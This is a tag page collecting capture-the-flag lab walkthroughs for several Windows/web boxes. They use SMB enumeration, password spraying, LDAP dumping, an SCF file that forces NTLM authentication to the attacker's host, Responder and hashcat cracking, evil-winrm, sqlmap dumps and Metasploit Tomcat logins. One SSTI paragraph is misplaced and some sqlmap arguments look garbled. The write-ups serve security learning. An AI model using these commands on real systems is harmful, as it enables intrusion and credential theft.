4 posts tagged with "windows"

Task 1​

What is the name of the non-default SMB share that is readable with guest access on Cicada?

Running smbclient -N -L //<target_ip> to connect to the share server without providing a password and list the shares we see two non-default shares named DEV and HR.

Next, to see which one is readable as a guest, we will try to connect to those specific shares. Running smbclient -N //<target_ip>/<share_name> we see the one we have access to read is the HR share.

Task 2​

What is the name of the file found in the HR share?

Seen in the previous task, from listing the contents of the HR share, the file name is "Notice from HR.txt".

Task 3​

Which user account is still using the company default password?

To see the contents of the file found, we can transfer it to the host by running get "Notice from HR.txt". Opening it, we see a welcoming message to a new hire with the default password but it does not give a username

Then, we can try to enumerate domain users on the target IP and save them to a file by running lookupsid.py anonymous@<target_ip> > lookupsid_output.txt. Then, we save the usernames cleanly we run grep '(SidTypeUser)' lookupsid_output.txt | awk -F '\\' '{print $2}' | cut -d' ' -f1 > users.txt. Finally using the password found in the file, we can perform a password spray attack by running netexec smb <target_ip> -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' and find the username to be michael.wrightson.

Task 4​

Which user has left their password in Active Directory metadata?

We dump the AD metadata using ldapdomaindump -u cicada.htb\\michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' <target_ip>. We then try the command grep -iE 'pass|key|desc|comment' domain_users.json to look for password in the file matching any lines that contain the mentioned keywords.

After finding the password we can try to connect with it using the users.txt file from the previous task as netexec smb <target_ip> -u users.txt -p 'aRt$Lp#7t*VQ!3'.

Task 1​

We're prompted for log on credentials when accessing the target over HTTP. What username is disclosed when looking at the HTTP response headers?

We use curl with the option for fetching headers only curl -I <target_ip> and see on the WWW-Authenticate the username admin.

Task 2​

Weak passwords are all too common and this target is no exception. What is the password for this target's login?

Before using any automated tools, we try with the default, common password admin and it gets us in. On the main page we are presented with a MFP Firmware Update Center.

Task 3​

There are several kinds of files that are commonly dropped into a file share to target other users who may browse to the share. If the user browses to the share, their host will try to authenticate to the attacker. What is the file extension that can be uploaded here to trigger that connection?

The file that is asked here, has the extension .scf which stands for Shell Command File. This file can be placed on a writable SMB share or web-based file upload to force outbound authentication requests. For more detailed information visit MITRE ATT&CK

Task 4​

We've intercepted an Net-NTLMv2 hash with Responder. What is the mode in Hashcat required to crack this hash format?

When Responder intercepts a Net-NTLMv2 hash, the format looks like:

USERNAME::DOMAIN:ServerChallenge:NTProofStr:Blob

This structure corresponds exactly to the format supported by Hashcat mode 5600 which is backed up by the Hashcat official documentation Hashcat Generic hash types

Task 5​

What is the tony user's password?

To solve this task, we will start responder sudo responder -I tun0 and then upload a scf file to the file share via the printer upload form that would trigger an SMB authentication. We create a file as follows:

[Shell]
Command=2
IconFile=\\<host_ip>\share\icon.ico
[Taskbar]
Command=ToggleDesktop

This works, and the Net-NTLMv2 hash is captured by Responder because this upload is reviewed manually and thus opened as the web page explains.

As mentioned in the previous task, the full hash string can be cracked using Hashcat mode 5600. We create a file called tony_hash with this hash, we run hashcat -m 5600 -a 0 tony_hash.txt /usr/share/wordlists/rockyou.txt and the password is cracked.

Task 6​

Submit the flag located on the tony user's desktop.

We will first list the shared folders on the target Microsoft-DS by running smbclient -L //<target_ip> -U 'tony' using the user tony's password we found in the previous task.

Then we can try connecting directly to the C$ default share by running smbclient //<target_ip>/C$ -U 'tony' which gave us access denied. We then try crackmapexec smb <target_ip> -u tony -p 'liltony' --shares

This validates that the user does not have access but we see that Windows 10 Enterprise is used which by default has WinRM installed and often enabled.

crackmapexec winrm <target_ip> -u tony -p liltony

Since the service is enabled we can use evil-winrm -i <target_ip> -u tony -p liltony. We have access and navigating to tony's Desktop we get the flag by cat user.txt.

Task 1​

Submit User Flag

We use nmap to find the services on the target machine and we see that an apache server runs on port 80.

nmap -sV target_ip

Navigating to the browser we see a login page where we will try bypassing the authentication using SQL injection.

Server-Side Template Injection (SSTI) vulnerability arises when an application incorporates user-supplied input directly into its server-side templates without proper sanitization or validation. Template engines, which combine templates with dynamic data to generate web pages, can be exploited through SSTI attacks.

To find forms that are candidates for sql injection run

sqlmap -u "http://10.129.51.14/" --forms --crawl=2 --dbms=mysql

--crawl=CRAWLDEPTH: crawls the website starting from the target url

We find a total of 8 targets. One of the identified forms is the login form and sqlmap auto-filled blank fields, tried multiple techniques and identified that the email field is vulnerable to time-based blind SQL injection.

After confirming the vulnerability we want to enumerate the database and find the table storing the usernames and passwords to get the user flag.

We can try running the following command to retrieve the databse names.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" --dbs

We found 2 available databases named information_schema and main.

Next, we will list the tables from each.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123/login" -D <database_name> --tables

Starting with the database named main, we find 3 tables blog, blog_comments and user and which we can further investigate. We start with the table user.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123/login" -D main -T user --columns

There, we find 4 columns in total with a column named email and a column name password that might get us the flags we need.

We then run the following command to retreive that information.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123/login" -D main -T user -C email,password --dump

We find the email and the password and with those credentials we login after we use a hash cracker to find the plain texts password from the hashed one.

Now that we are logged in as admin, we can see a gear on the top right that redirects as to internal-administration.goodgames.htb. We need to edit the /etc/hosts file to point this domain to the target machine's IP. Note, editing the hosts file requires administrative privileges.

Task1​

Which TCP port is open on the remote host?

Run nmap to scan for ports

nmap -sS -p- <target_ip>

After scanning, the port 8080 is revelead to be open, where the http-proxy service is running.

Task 2​

Which web server is running on the remote host? Looking for two words.

To find the web server, we need to add the version field on the nmap scan.

nmap -sV -p 8080 <target_ip>

We see on the version that the web server is Apache Tomcat.

Task 3​

Which relative path on the webserver leads to the Web Application Manager?

Open a browser and navigate to the ip address of the target. Remember to specify the port to be 8080.

Take a look at the page, to see you can find anything useful. Under Managing Tomcat you see a URL to manager webapp which might be what is refered as Web Application Manager. It is stated that for security, access is restricted and users are defined in $CATALINA_HOME/conf/tomcat-users.xml. This seems like an interesting information, but let's first see what the URL gets us. When clicking we get redirected to /manager/html where we are asked to input our credential. This is a point we should keep in mind, but for now we got the relative path the question is asking for.

Task 4​

What is the valid username and password combination for authenticating into the Tomcat Web Application Manager? Give the answer in the format of username:password

On the previous step, we navigated to the /manager/html were we were asked for credentials. Since we were not able to authenticate, we show an example in the page of how to add a role to a user for accesssing the manager application. We can try to use those example credentials and see if they work on the login prompt, and they do!

Another approach to this, is using Metasploit Framework. First, run msfconsole and then search tomcat. There you will find the auxiliary auxiliary/scanner/http/tomcat_mgr_login which will attempt to login based on a list of username - password names. To use it, run use <number_of_option> and then to see what you it is required for you to set show options.

To select the target IP address and the port, run set RHOSTS <target_ip> and set RPORT <target_port>. Then type run and you will see that a login attempt was succesfull! As seen, those are the same credentials that were found before.